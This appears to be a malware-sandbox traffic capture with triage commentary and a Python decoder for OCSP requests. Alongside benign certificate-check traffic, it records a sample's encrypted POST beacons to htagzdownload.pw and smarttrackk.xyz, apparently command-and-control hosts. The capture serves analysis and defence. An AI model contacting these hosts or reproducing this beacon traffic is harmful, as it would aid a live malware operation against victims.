Expires: Fri, 13 Jul 2018 05:08:00 GMT
Cache-Control: public, max-age=31536000
CF-RAY: 37d9b8cf827883f4-KBP
Cache: HIT
X-Cached-Since: 2017-07-13T05:08:00+00:00
X-ID: ix-up-a243
Access-Control-Allow-Origin: *
Cache: HIT
X-Cached-Since: 2017-07-13T13:12:04+00:00
X-ID: m9-up-e245
[PNG image data, one 0x1cb5-byte chunk: Adobe Photoshop CC 2017 (Macintosh) export with embedded XMP metadata; binary body omitted]

<<< skipped >>>

GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com


HTTP/1.1 200 OK
Date: Wed, 27 Sep 2017 23:18:14 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 19 Oct 2012 20:08:11 GMT
Accept-Ranges: bytes
Content-Length: 893
Cache-control: max-age=86400
Content-Type: application/x-pkcs7-mime
[DER PKCS#7 SignedData certificate bundle, 893 bytes, truncated: carries the self-signed DST Root CA X3 certificate (issuer and subject "Digital Signature Trust Co.", valid 2000-09-30 21:12:19Z to 2021-09-30 14:01:15Z); binary body omitted]

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.usertrust.com


HTTP/1.1 200 OK
Date: Thu, 28 Sep 2017 03:12:58 GMT
Server: Apache
Last-Modified: Mon, 25 Sep 2017 21:19:01 GMT
Expires: Mon, 02 Oct 2017 21:19:01 GMT
ETag: 5A9FD501F956779F1497BE2BD6DE25CED4D61D4F
Cache-Control: max-age=410162,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: rmdccaocsp20
Content-Length: 471
Connection: close
Content-Type: application/ocsp-response
[DER OCSP response, 471 bytes: status for the queried certificate with thisUpdate 2017-09-25 21:19:01Z and nextUpdate 2017-10-02 21:19:01Z, matching the Last-Modified and Expires headers; binary body omitted]


POST /temptrack/Store HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: smarttrackk.xyz
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive


HTTP/1.1 100 Continue

order="vh0WvrSx7tyP3j3ziobv3GXGzT4FpHv26R7/Npi4on94ORsW2Aryk0kdr/2Q6JKhifYwEIQGonpYvY/8NzC/mbmExZ70TXG5yzf4ndoy0+tgMwGtdpdNJHOUXtlljbEfFYdDDpc2LRASl1PFK0/abPj8SzeyNOH+VuvYrWZdDptqIcjaDla8EMot1jb+zdjjxgwPu2UieywIqufk/ANIqA=="


HTTP/1.1 200 OK
Server: nginx/1.10.1 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Date: Thu, 28 Sep 2017 03:12:10 GMT
Content-Encoding: gzip
14
[20 bytes of gzip data, the size of a gzip stream of empty input, i.e. an empty reply]
0


GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86408
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Fri, 16 Sep 2016 21:16:59 GMT
If-None-Match: "8017f9a85f10d21:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/vnd.ms-cab-compressed
Last-Modified: Fri, 22 Sep 2017 22:03:52 GMT
Accept-Ranges: bytes
ETag: "014e8acee33d31:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 53978
Date: Thu, 28 Sep 2017 03:12:22 GMT
Connection: keep-alive
X-CCC: SE
X-CID: 2
[MSCF cabinet, 53978 bytes, truncated: contains authroot.stl, the Microsoft Automatic Root Certificates Update trust list that CryptoAPI downloads while building a chain to a root it does not yet hold; binary body omitted]

<<< skipped >>>

GET /pokermatch/podarok200/images/f-icon-3.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Sep 2017 03:12:53 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dac7143069d49c3cfb69be27932ba61891502689050; expires=Tue, 14-Aug-18 05:37:30 GMT; path=/; domain=.gamesforluckers.com; HttpOnly
ETag: W/"598d8e77-8d5"
Last-Modified: Fri, 11 Aug 2017 11:01:11 GMT
CF-Cache-Status: REVALIDATED
Expires: Tue, 14 Aug 2018 05:37:30 GMT
Cache-Control: public, max-age=31536000
CF-RAY: 38e19005b0318ad4-KBP
Cache: HIT
X-Cached-Since: 2017-08-14T05:37:30+00:00
X-ID: ix-up-a243
Access-Control-Allow-Origin: *
Cache: HIT
X-Cached-Since: 2017-08-14T15:35:11+00:00
X-ID: m9-up-e239
[PNG image data, one 0x8d5-byte chunk: Adobe Photoshop CC 2017 (Macintosh) export with embedded XMP metadata; binary body omitted]

<<< skipped >>>

GET /pokermatch/podarok200/images/app-google-play.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Sep 2017 03:12:53 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dcbb34ddc65f732ff1e849188c55ecfe71502689050; expires=Tue, 14-Aug-18 05:37:30 GMT; path=/; domain=.gamesforluckers.com; HttpOnly
ETag: W/"598d8e77-1fcf"
Last-Modified: Fri, 11 Aug 2017 11:01:11 GMT
CF-Cache-Status: REVALIDATED
Expires: Tue, 14 Aug 2018 05:37:30 GMT
Cache-Control: public, max-age=31536000
CF-RAY: 38e19007e6018219-KBP
Cache: HIT
X-Cached-Since: 2017-08-14T05:37:30+00:00
X-ID: ix-up-a243
Access-Control-Allow-Origin: *
Cache: HIT
X-Cached-Since: 2017-08-14T15:35:30+00:00
X-ID: m9-up-e239
[PNG image data, one 0x1fcf-byte chunk: Adobe Photoshop CC 2015 (Windows) export with embedded XMP metadata; binary body omitted]

<<< skipped >>>

GET /pokermatch/podarok200/images/chip-2.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive



[response headers absent from the capture; PNG image data whose XMP metadata derives from Adobe Photoshop document adobe:docid:photoshop:84bfd548-5114-11e7-a192-86375482fcfa, like the other Windows-made assets above; binary body omitted]

<<< skipped >>>

POST /Series/Conumer4Publisher.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: htagzdownload.pw
Content-Length: 97
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue

jiglibaf=2/PacbsI5vqBEINXG8q3htXyHlRmEttLK05YRLF2uhVSi3lmDCYCkcXLkL8i97mYts048SLWjZdoQjw45euh+g==


HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 28 Sep 2017 03:12:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
1e5
[3 non-printable bytes]
TPFaFCsEzvY+aW2efHd+n8w+DY613ok9Jyg7CnMDsQykG+jlKP5EVXLGWkbGyi
Ehb6S01GNDfTckpJd+ZdkkzOU3/mL/CispOHOwzKJru9dUFXYJAd6O2EEsX5KQc1nGS6RW
iGg0gk8oCqD5Yz2i7LHAh17LKSD8KK+fwizS7aCLneSc1LOOkB62UWYu5Ah7BQeF17kH4j
vPJ6beWS57ApuUITIaJ7pFi0G9psjIqRiMYPoBFXQPzUmo59TNRFvnc21xwZNkp4CmA9Tu
EBHiu0U6NwdZtYgVLEuol22SRx/2/5R8dx1jBRjcf83Ojx2FiveeHEfnuWUndjk4nMiU5V
HK8EuFO00SqsqbKc7BmYbRa2szN2nJeZAEHp8xFHauXs9U4ygBFJ0Cgn8Z1gQCdM+YJZRm
MdPksJ/UIvDzMC919gxZko4MUCVwlNWvGK/XTw5ScQluuKXab46FXnW7Ig==
0



GET /Series/Movie/Ragnar/2/UA.json HTTP/1.1
Host: htagzdownload.pw


HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 28 Sep 2017 03:12:10 GMT
Content-Type: application/json
Content-Length: 3756
Last-Modified: Thu, 28 Sep 2017 03:00:02 GMT
Connection: keep-alive
ETag: "59cc65b2-eac"
Accept-Ranges: bytes
zS5RDJPMRa0g0Yy9a/Q4VhrwtkEazi5pkwGuseRyM3v56WYBFR2oHpKie0MyVzk5X494m7
8N7Itz45Iyfa2pZt9x/S4qpiDty+Fi6mTgwplUJdnp/Mv8AVWgXNtAGe7OqjK87BJkoS4H
HdDZR1+Y9tLkqQ1sAlM0MovLBW53IHFWafHIYZnW97yzKirpvPYJVHdxzwG3e/B+HytJ6L
jTtpSiVFthhzm0jxyJ5D0SxjGRINSP2yuAjUvIZC3hvyicI94YXFwwuVLuvkNc+4Hs0OHh
/L/HUup3BhjS5pEd3gKrazzMgLlU/7UTDyiGbPvIcssAsqKZuM/GCZIWbcyJMR20k40LeP
hVylLfXKbIZnd4UcyAnrOQ9SUNLaQ46Unyh03O2a1stVBXmNi4Zsd3lJHDav0r4zrgymUZ
Ws9OZCuitJa84yyT8f40i6/6TZzoiaSsp/kGszHouDsW3w6P7gjh1p4tFY4SCdBKmu39GL
jedtUyc6U+eVGX0tihdFBsO+IYDtDaybj58iCujcd2cgGrlIdv9MN/HztitDpA5U092EcK
TRJH0fphMGSvSjAzIqNSjYIO3rbBLSn10XDMb8wa/s9TN97cuUR88Ri8BFb8rvbeiMG3XV
DPK0y70a+dyJBaAziG9EErJW7caeoz8ekpXpeqJZtwZjNNn/kCjYNy05UIsY0WpEYHzYyr
HcXXyS2ofFtw+OIc5kdVNHAUhNgIy5SMfjCdDcEa8lNLP9VgeQo02hlHRW61fJgctbg8FO
CKERoErpC2i6TIxFuNd+Y0dPweFP+5I/imp8LlJSQYOeYhu3d3epSsn9FntM18NKC4v7uU
pbg6pRRy3zIa2DZwc8fZ7+Aj+uutT0AAy2hmSI4a9pUYjA8LotDW5vOw4VE+PDrTyamrX+
mzclFkiG+9kakTZUPlmKRYvVU5fFghev4lsHWC1qVqt1fQOoiPPnn2PwSiUO9tEn94PzBl
VeyTJDUkgfBv/bCuuPcW/9rlKaVpp+zEyspe/Bo6oEHpQgHnojFFfKTjhlRURm2k2xCmFA
fXrhEUqAIlR0kh11JuONYoEthEnlsPgpPxjkUb1mqnJkEVchbxU/c1+cSS+R40cW56aQoe
bipflcO45lQdTa7iYQ2OzF4s/ucYzU8sIktZX3jDC2OXLBaxVgqVW9NIAS/uqV1rm4dnPi
F92huZeZ95V96N77QOGnAEWgqflkIlrff2sXoNqHeSGhPDWR9Z3kKVHjNSgczIqX7igiuH
QPbIbilWbW+7KBXEdKLljT5DhSrBJ+qT7pK2XcYZC7boy1bUx0dXcrNThyjowxLVD6ILPd
YSFFO+EU632RlYaqvWTe0eop1u/mM8sP0wSa56xlPfr3voNLzNSoANLf7qFmL9Ezj5O4Kv
zKVGs1ixWv03VW+F+s5nVCc2wvWDCwxzWqfA7bRwleP4SviR1RIBmdMlcRFUbG9jJt7nTy
cks41TksB4mYq+YlmBOqnBuTXHvmkjd/jJCsUwNQeGuoet8HLoTTbxIkwF1aINP7VW

<<< skipped >>>

POST /Series/Conumer1Pirlo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: htagzdownload.pw
Content-Length: 51
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



Lyouvi=RCO0bze5gj137V+GKKrirZDEhbKuQIjqi1P/djTx5n4=


HTTP/1.1 200 OK

Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 28 Sep 2017 03:12:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
683.....O4lnG3yQ9ZglqSdq92XDEK45514hRgK1mDaJzh /YNAqdVo1ys7bxazBBHmvqm
7yiJm491FeUBbpYiGf7XKms85xq/tqN11oDz70o7jAtrraFMkfS5jAZGxMBn39RfTbwo5o
njL0h5n3lPeevQrJn/dl phmM6Yble9HKzk7Raku4134022M9JSrBscqoyOFUyAmW CJF1
Fj7L494R8aRo5CxIUn3qGaZygn1LaxN115uMkxMVvUWTRb/MBkpdw9A59jUk7MGtIUP8uw
OTJu2yE4BUmnIfOltXz1/0pFo0kbE0HSV/Pq3gtNdC2DVwTTYFOSwpNuz 43dze5tN4On
RLHwiyn 8MpeP4tCqgVs0oo sX eZQUUDtREUao50I6CXPgvEUEYOsUQ5sOzVjWkEIb3Ft
oYgY7sDczsC1JInYdwWlru3any8Btf1 /w6k3rLL7DXtQrrorCy9ArgXaQrsMEpbhk2rZE
TpWmns2vK5JIY yRz18Fc/LqOhf1IanVuJt05MCDJleen/1xfbkt0UZq su5YORyRwiy8u
YpHuP0ftAQngljvriYCoSI1S8Mb/rJ/Qb2VUeuQydM4TlzaNuX PSUuIPpoyd5jAUDr 2
O1e O/r IhZZfJx5vOSnPCZfl/IJOLC0VQyoWeq 4epSePPsO2TOHtRFePjCj1dM2aD6Jk
NsovzGFfFd5piOixEtdzGtStVGb3OBQwQhH/QaMlLMaiP9AxlkNbyLbuyS48aXX5 fpFc3
lMUBvfhcV69Ui/xjMWRKJFez0f6eOv7eMrAFwPqLXS6d/RU1mAz hiQc/kU1f9LdJOfkZT
AJKuxagwCbrWJu4HymOVETbLPT3Hr BjfrwZRvco93HEvog0 F7fJ0mYnq7tO0I8vLNnZn
7vtCV0RGFW3oRMVkdoR7cP0F/npMUuszA2YRGvGm3HSEPPl8OnPB426SLmtbby/tERR//m
JK4v7d3qaass5nW1E6YmsXp yy/tHmJyTU7EIcSrKeDADg TnI7XXggm nUeeM2RN/yKHo
8z5xg3SvLGe4vsNpXCKj10AoVJ7kwU/a2bSCO2mZxTBWh6dpJITCTWUvXI JdfI SZ4auA
P DgovFfW57uaYdVuA0ERKSyZtg1xP0hN/alv/AYU7FdwfiFXFARfMoylKrragiLzejk8m
1NImxKEnZ11Gojo6AlvhuZX4xgWB0Wh F4xCyaXf2mvaE8aNv40P1gDLgdH82diZ/fJAD8
5L6haM281MBOeMcOR4e949wakeoRGS5oIs2M4ZqfNm7WgfuIYAlrzv BgDdpLzBsDq4gjH
GFxIveqrMuADryUtzHaHJGu/Psd kHbIdKERq8 IlBzSkdrAryNore HcOzhQ/pxrWPLGJ
LfRDNmmw WZGx6PpeozP/8poH4jW9z prHoRx8Rkh4xFLvrVn6uSUAso/6QBkyB3ArUi5s
T1yuTeBzJHBcVC06hBmrQpbENF3CD2hfgS3kp/KU4dFTxCFw7GwMQYq/SBZqET0nuI

<<< skipped >>>

GET //MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 28 Sep 2017 03:12:29 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120200, public, no-transform, must-revalidate
Last-Modified: Thu, 28 Sep 2017 02:21:16 GMT
Expires: Fri, 29 Sep 2017 14:21:16 GMT
ETag: "c9d119809ad2c096216a3327e7898a1ae4fbbe38"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Content-Length: 1730
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0.....0..1.0...U....US1.0...U....Ari
zona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Dad
dy Root Validation Authority - G2..20170928022116Z0d0b0:0... .........
#o..K......#..... ...:....g(.....An ............20170928022116Z....201
70929142116Z0...*.H...................kw.gzl*..N|YI...........6...|.h.
.a...Y.Iws7...r.\*.9..b.%u.~.p..1.)MY.`..9`..5...j....x......$f ....G.
. 8$>..L...; W.c...k...v(....C..V.2..<qS?..iF....K^..{8........R
j...-..>...........\.D..":".....P....Y.}.0..9..=....AO..]..V....Z(.
s.g....L5..Q$........0...0..~0..f........T|....70...*.H........0..1.0.
..U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com
, Inc.110/..U...(Go Daddy Root Certificate Authority - G20...161213070
000Z..171213070000Z0..1.0...U....US1.0...U....Arizona1.0...U....Scotts
dale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Au
thority - G20.."0...*.H.............0.............}...@.H..........j.b
.2.c....'eSA.....6""2.hf.m.m9........_N."gV..{.J"{..0f.W$.Xr....|U.F.!
.K.0 .(p......9.I......c.c\.9.xt.v.UN...%....,R....ZJ......rz.Z..p...r
u.6.....0..t....*...T.W.....?...X...( ..z.[. .A... z.[>-.y>...nv
U...g.wU........ Fh.6F...}.........0..0...U.......0.0...U...........0.
..U.%..0... .......0...U........J!~...}....^].....0... .....0......0@.
.U...90705.3.1./hXXp://crl.godaddy.com/repository/gdroot-g2.crl0J..U.
.C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repository/0
...*.H.............=......|Q.y.kI$...T@.ff.m...1......\...10..T...

<<< skipped >>>
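
The requests to ocsp.godaddy.com (and, further down, ocsp.usertrust.com, ocsp.int-x3.letsencrypt.org and isrg.trustid.ocsp.identrust.com) carry the User-Agent Microsoft-CryptoAPI/6.1: they are Windows checking certificate revocation while it builds a chain, and the same goes for the crl.godaddy.com and authrootstl.cab fetches. The base64 in each GET path is a DER-encoded OCSPRequest (RFC 6960, GET form), not a command-and-control exchange. The decoder below is an added example and is not part of the Lavasoft report; it walks that DER by hand and pulls out the CertID fields. Its input is the first ocsp.godaddy.com request path shown above, kept as a constructed sample string with the doubled leading slash exactly as the sandbox recorded it.

```python
"""Decode the GET-style OCSP requests that Microsoft-CryptoAPI sent during the run."""
import base64
from urllib.parse import unquote

# Constructed sample input: the first ocsp.godaddy.com request path from the capture
# above, including the doubled leading slash exactly as the sandbox recorded it.
SAMPLE_OCSP_PATH = (
    "//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQU"
    "OpqFBxBnKLbv9r0FQW4gwZTaD94CAQc="
)

SHA1_OID = "1.3.14.3.2.26"   # id-sha1, the hashAlgorithm CryptoAPI uses in CertID


def _read_tlv(buf, pos):
    """Read one DER element at pos; returns (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long-form length (not needed for this sample)
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def _children(buf):
    """Yield (tag, value) for each top-level element of a constructed DER value."""
    pos = 0
    while pos < len(buf):
        tag, value, pos = _read_tlv(buf, pos)
        yield tag, value


def _first_sequence(buf):
    """Return the first SEQUENCE child, skipping optional context-tagged fields
    such as TBSRequest's [0] version and [1] requestorName."""
    for tag, value in _children(buf):
        if tag == 0x30:
            return value
    raise ValueError("expected a SEQUENCE")


def _decode_oid(raw):
    """Turn DER OBJECT IDENTIFIER content bytes into dotted form."""
    arcs, value = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def decode_ocsp_get(path):
    """Parse an RFC 6960 GET request path and return the CertID it asks about."""
    der = base64.b64decode(unquote(path.lstrip("/")))
    ocsp_request = _first_sequence(der)          # OCSPRequest
    tbs = _first_sequence(ocsp_request)          # TBSRequest
    request_list = _first_sequence(tbs)          # requestList
    request = _first_sequence(request_list)      # the single Request in this sample
    cert_id = _first_sequence(request)           # CertID
    alg_id, name_hash, key_hash, serial = (v for _, v in _children(cert_id))
    oid = next(v for t, v in _children(alg_id) if t == 0x06)
    return {
        "hash_algorithm": _decode_oid(oid),
        "issuer_name_hash": name_hash.hex(),
        "issuer_key_hash": key_hash.hex(),
        "serial_number": int.from_bytes(serial, "big", signed=True),
    }


if __name__ == "__main__":
    for key, value in decode_ocsp_get(SAMPLE_OCSP_PATH).items():
        print(f"{key}: {value}")
```

For the sample path this yields a SHA-1 CertID with serial number 7 under a GoDaddy issuer, which matches the "Go Daddy Root Validation Authority - G2" responder named in the response body above. The practical point for triage: Microsoft-CryptoAPI requests to OCSP responders, CRL distribution points and the authroot update are host background activity that any signed binary can trigger, so they belong in the noise column; the sample's own traffic in this capture is the User-Agent-less exchange with htagzdownload.pw.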

GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 28 Sep 2017 03:12:24 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120878, public, no-transform, must-revalidate
Last-Modified: Thu, 28 Sep 2017 02:33:05 GMT
Expires: Fri, 29 Sep 2017 14:33:05 GMT
ETag: "939596d17cbb7a2f4b26cb05daf2862a03088c46"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Content-Length: 1697
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0......0..1.0...U....US1.0...U....Ar
izona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Da
ddy Root Validation Authority - G1..20170928023305Z0f0d0<0... .....
.... ......]..J^.y_..F<........L.q.a.=....j...........2017092802330
5Z....20170929143305Z0...*.H.............f.f....O_.nF.....(D. .X......
...Li7..3.kW.sJ]s.\.Dz..^Syq...R..-.."Mw MP..=#.....E.[..5...e.....a..
_M..;lqS...E(T...^..G.x3....pv.q.S->-..c ...' .L.?.w..^4.....1.#|..
.X..%.uR$E3.TPV.Y". .La..}...i...W.v.!.)N....&{./M..I.^.bo..@I^A.....]
..Y....\.&g....$.N!M...b0..^0..Z0..B.......1g....r.0...*.H........0c1.
0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Clas
s 2 Certification Authority0...161213070000Z..211213070000Z0..1.0...U.
...US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, In
c.100...U...'Go Daddy Root Validation Authority - G10.."0...*.H.......
......0.............}...@.H..........j.b.2.c....'eSA.....6""2.hf.m.m9.
......._N."gV..{.J"{..0f.W$.Xr....|U.F.!.K.0 .(p......9.I......c.c\.9.
xt.v.UN...%....,R....ZJ......rz.Z..p...ru.6.....0..t....*...T.W.....?.
..X...( ..z.[. .A... z.[>-.y>...nvU...g.wU........ Fh.6F...}....
.....0..0...U.......0.0...U...........0...U.%..0... .......0...U......
..J!~...}....^].....0... .....0......0=..U...60402.0...,hXXp://crl.god
addy.com/repository/gdroot.crl0J..U. .C0A0?..`.H...m....000... .......
."hXXp://crl.godaddy.com/repository/0...*.H...............f...gb.dI..F
.72.$.......?/.....5.9-F.=...c....c..Wg.U......j0....A..[O.A>".

<<< skipped >>>

GET /pokermatch/podarok200/images/f-icon-2.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Sep 2017 03:12:53 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d3ec29983b37522cd9db90f3d051fa9f71505113149; expires=Tue, 11-Sep-18 06:59:09 GMT; path=/; domain=.gamesforluckers.com; HttpOnly
ETag: W/"59b2bfc5-59f"
Last-Modified: Fri, 08 Sep 2017 16:05:25 GMT
CF-Cache-Status: REVALIDATED
Expires: Tue, 11 Sep 2018 06:59:09 GMT
Cache-Control: public, max-age=31536000
CF-RAY: 39c8be1d308b8e2b-DME
Cache: HIT
X-Cached-Since: 2017-09-11T06:59:09+00:00
X-ID: ix-up-a243
Access-Control-Allow-Origin: *
Cache: HIT
X-Cached-Since: 2017-09-25T14:09:52+00:00
X-ID: m9-up-e237
59f...PNG........IHDR...*...G.....q.......tEXtSoftware.Adobe ImageRead
yq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M
0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:x
mptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "&
gt; <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#
"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/
xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="h
ttp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe
Photoshop CC 2017 (Macintosh)" xmpMM:InstanceID="xmp.iid:06F7D5CF529F1
1E7BDC0E513E060F7A3" xmpMM:DocumentID="xmp.did:06F7D5D0529F11E7BDC0E51
3E060F7A3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:24449FC
6529111E7BDC0E513E060F7A3" stRef:documentID="xmp.did:06F7D5CE529F11E7B
DC0E513E060F7A3"/> </rdf:Description> </rdf:RDF> </x
:xmpmeta> <?xpacket end="r"?>.@......IDATx...AK.A..G...... ."
...D'..o._.s...t..t.N....]B..E%t...P.H'3.j....s(............x.o.0....*
?........V...>.s".|.?..h...'......-.....%. .b)../.VT.>.a...|.1."
..r..T....y..~...1G..!.].s* ....ir.|y7.@....F.J..R...3.'......$.; .H..
B.I&...".....-^.W...}4...\..A|.{*g./;=.w.\.c.}.>....A..A..A..A..A..
A..A..A..A..A..A..A....4.K.;.o1..``..............V.7ch.[..N..Gs...[...
...e'.d-..*g..4.'q\.....2g.T..eI.U....I<...m..,]X....9.K.<Il.C=.
.....%W....K....:.G...c8.j.L...#.>...fEkt..9?...G.@u.(V.....xF...mQ
...H..TV.?...3s..u.T.E.bK}.0...k.'L.5....IEND.B`...0..
....

<<< skipped >>>

GET /pokermatch/podarok200/images/app-macos-x.png HTTP/1.1

Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Sep 2017 03:12:53 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db71024b546714c4823dcbfc378c5675d1505112732; expires=Tue, 11-Sep-18 06:52:12 GMT; path=/; domain=.gamesforluckers.com; HttpOnly
ETag: W/"59b2bfc5-1f54"
Last-Modified: Fri, 08 Sep 2017 16:05:25 GMT
CF-Cache-Status: REVALIDATED
Expires: Tue, 11 Sep 2018 06:52:12 GMT
Cache-Control: public, max-age=31536000
CF-RAY: 39c8b3f121708abc-KBP
Cache: HIT
X-Cached-Since: 2017-09-11T06:52:12+00:00
X-ID: ix-up-a243
Access-Control-Allow-Origin: *
Cache: HIT
X-Cached-Since: 2017-09-25T14:09:41+00:00
X-ID: m9-up-e237
1f54...PNG........IHDR.......&.....">......tEXtSoftware.Adobe Image
Readyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id=
"W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/"
x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
"> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax
-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adob
e.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/Reso
urceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocum
entID="xmp.did:01801174072068118DBB8F711C24FFAB" xmpMM:DocumentID="xmp
.did:47D831FE52A511E7BDC0E513E060F7A3" xmpMM:InstanceID="xmp.iid:47D83
1FD52A511E7BDC0E513E060F7A3" xmp:CreatorTool="Adobe Photoshop CC 2015
(Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e406bbd
8-b32b-ad43-b177-c791ebe91eb7" stRef:documentID="adobe:docid:photoshop
:84bfd548-5114-11e7-a192-86375482fcfa"/> </rdf:Description> &
